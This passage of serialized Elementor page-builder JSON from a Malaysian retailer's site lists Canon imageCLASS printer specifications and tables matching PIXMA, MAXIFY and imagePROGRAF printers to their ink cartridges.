]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1f6f8ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"a880ac9\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF266dn\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d63382c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/f8389aa599cc42db986e698ac364f9fc_MF266dn-1.png\",\"id\":2726}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"73a1481\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>The Multifunction printing solution with Mobile Printing and Network<\\/strong><\\/p>\\n\\n<\\/div>\\nFeaturing Network printing and SEND technology, MF266dn is the productive choice for your business operations.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 28ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 5.2 sec<\\/li>\\n \\t<li>Max. paper input capacity: 251 sheets<\\/li>\\n \\t<li>Print resolution: 1,200 \\u00d7 1,200 dpi (equivalent)<\\/li>\\n<\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2fabcd2\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"15\",\"right\":\"15\",\"bottom\":\"15\",\"left\":\"15\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"0a62d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"13\",\"right\":\"13\",\"bottom\":\"13\",\"left\":\"13\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e45d15\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"04de22f\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"790e84e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/7583474b04984f42b18e94fe91075ec9_MF913w-1.png\",\"id\":2727}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"880dc7e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity, bundled with three toner cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bdfedb6\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"55572b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"00c113d\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF113w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"77e13da\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/e2fa8e1c70b54636a6922a5d483f3250_MF113w-2.png\",\"id\":2728}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"2036878\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact All-in-One with wireless connectivity<\\/strong><\\/p>\\n\\n<\\/div>\\nSimple solution to your print, scan and copy needs. The small footprint fits desktops with limited space perfectly. Equipped with built-in Wi-Fi and access point capability.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>FPOT: Approx. 6.5 sec<\\/li>\\n \\t<li>Max. paper input capacity: Up to 150 sheets<\\/li>\\n \\t<li>Print resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n<\\/ul>\\n<center>[maxbutton id=\\\"11\\\" ]<\\/center>\\n\\n<\\/div>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"cd5acb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7671e33\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS LBP913w\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d405a8d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/bebe20358b144d6a9208a36dabdf2a3e_LBP913w-1.png\",\"id\":2730}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9ac8d27\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact with wireless connectivity, bundled with 3 cartridges<\\/strong><\\/p>\\n\\n<\\/div>\\nKeep printing simple. The compact size fits desktops with limited space perfectly. Bundled with 3 toners, you can print up to 7,500 pages with low cost per print.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print<\\/li>\\n \\t<li>Print Speed (A4): Up to 22ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 250 - 2,500 pages<\\/li>\\n \\t<li>First Print Out Time (A4): Approx. 6.5 sec<\\/li>\\n \\t<li>Print Resolution: Up to 2,400 (equivalent) \\u00d7 600 dpi<\\/li>\\n \\t<li>Mobile Printing<\\/li>\\n<\\/ul><\\/div>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"dfd3898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"5\",\"bottom\":\"5\",\"left\":\"5\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98ff69a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"9dc3933\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF525x\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bdbe9d7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3fd4600fbc4b454ca6a98e1186caa1a7_imageclass-mf525x_01.png\",\"id\":2731}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"7b20d6b\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n\\nSmarter way to improve office productivity and work efficiency. Equipped with innovative solution in a robust, compact design, the MF525x integrates seamlessly into busy offices and workgroups.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 43ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 2,000 - 7,500 pages<\\/li>\\n \\t<li>FPOT: 6.2secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 2,300 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"f0eb648\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f3b97a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ef6036c\",\"elType\":\"widget\",\"settings\":{\"title\":\"imageCLASS MF426dw\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"1e51740\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/3ed8c0ae6e8d4e3c9c7122fec0cd35f4_imageclass-mf426dw_b1.png\",\"id\":2732}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6ca5e93\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div class=\\\"overview-head\\\">\\n<div class=\\\"overview-head\\\">\\n<p class=\\\"sub-title\\\"><strong>Compact 4-in-1 Black and White Multifunction for the smart business<\\/strong><\\/p>\\n\\n<\\/div>\\nWith cutting-edge features, the MF426dw is set to boost work productivity in the modern office.\\n<ul class=\\\"list-normal\\\">\\n \\t<li>Print, Scan, Copy, Fax<\\/li>\\n \\t<li>Print Speed (A4): Up to 38ppm<\\/li>\\n \\t<li>Recommended monthly print volume: 750 - 4,000 pages<\\/li>\\n \\t<li>FPOT: 5.5secs. (A4)<\\/li>\\n \\t<li>Max. paper input capacity: Up to 900 sheets<\\/li>\\n \\t<li>Print Resolution: Up to 1200 x 1200dpi (equivalent)<\\/li>\\n<\\/ul>\\n<\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"2a7e17a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"11\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"30\",\"bottom\":\"30\",\"left\":\"30\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9f4fce1\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"45b0f85\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"d249821\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cartridge Printers :-\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2dd6823\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"d81a183\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62697a3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"    <table width=\\\"378\\\" border=\\\"1\\\">\\n      <tbody>\\n      <tr>\\n        <td width=\\\"170\\\"><strong>Model<\\/strong><\\/td>\\n        <td width=\\\"208\\\"><strong>Cartridge \\/ Bottle<\\/strong><\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td rowspan=\\\"13\\\" align=\\\"center\\\">imagePROGRAF PRO-500<\\/td>\\n        <td>Maintenance Cartridge MC-20<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PFI-50 (Blue)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PFI-50 (Chroma Optimizer)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PFI-50 (Cyan)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PFI-50 (Gray)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PFI-50 (Magenta)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PFI-50 (Matte Black)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PFI-50 (Photo Black)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PFI-50 (Photo Cyan)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PFI-50 (Photo Gray)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PFI-50 (Photo Magenta)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PFI-50 (Red)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PFI-50 (Yellow)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY iB4170<\\/td>\\n        <td>PGI-2700 (Black)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Cyan)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Magenta)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Yellow)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Black)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Cyan)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Magenta)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Yellow)<\\/td>\\n      <\\/tr>\\n        <tr>\\n        <td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5070<\\/td>\\n        <td>PGI-2700 (Black)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Cyan)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Magenta)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Yellow)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Black)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Cyan)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Magenta)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Yellow)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5170<\\/td>\\n        <td>PGI-2700 (Black)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Cyan)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Magenta)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Yellow)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Black)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Cyan)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Magenta)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Yellow)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5370<\\/td>\\n        <td>PGI-2700 (Black)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Cyan)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Magenta)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Yellow)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Black)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Cyan)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Magenta)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Yellow)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td rowspan=\\\"8\\\" align=\\\"center\\\">MAXIFY MB5470<\\/td>\\n        <td>PGI-2700 (Black)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Cyan)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Magenta)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700 (Yellow)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Black)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Cyan)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Magenta)<\\/td>\\n        <\\/tr>\\n      <tr>\\n        <td>PGI-2700XL (Yellow)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E3170<\\/td>\\n        <td>CL-57 (Colour)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>CL-57S (Colour)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PG-47 (Pigment Black)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td rowspan=\\\"3\\\" align=\\\"center\\\">PIXMA E410<\\/td>\\n        <td>CL-57 (Colour)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>CL-57S (Colour)<\\/td>\\n      <\\/tr>\\n      <tr>\\n        <td>PG-47 (Pigment Black)<\\/td>\\n      <\\/tr>\\n      <\\/tbody>\\n    <\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"4c78b87\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"71e2027\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E4270<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E470<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E477<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E480<\\/p><\\/td><td width=\\\"208\\\"><p>CL-57 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-47 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E510<\\/p><\\/td><td width=\\\"208\\\"><p>CL-98 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-88 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA E560 \\/ E560R<\\/p><\\/td><td width=\\\"208\\\"><p>CL-99 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-89 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G1010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G2010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3000<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G3010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA G4010<\\/p><\\/td><td width=\\\"208\\\"><p>GI-790 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>GI-790 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP100<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP110 (with battery)<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-36 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-35 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP1300<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2770 \\/ iP2772<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP2870S<\\/p><\\/td><td width=\\\"208\\\"><p>CL-746 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-746S (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-745S (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"13e8990\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"70107ac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP4200<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA iP7270<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-751 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-751 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td 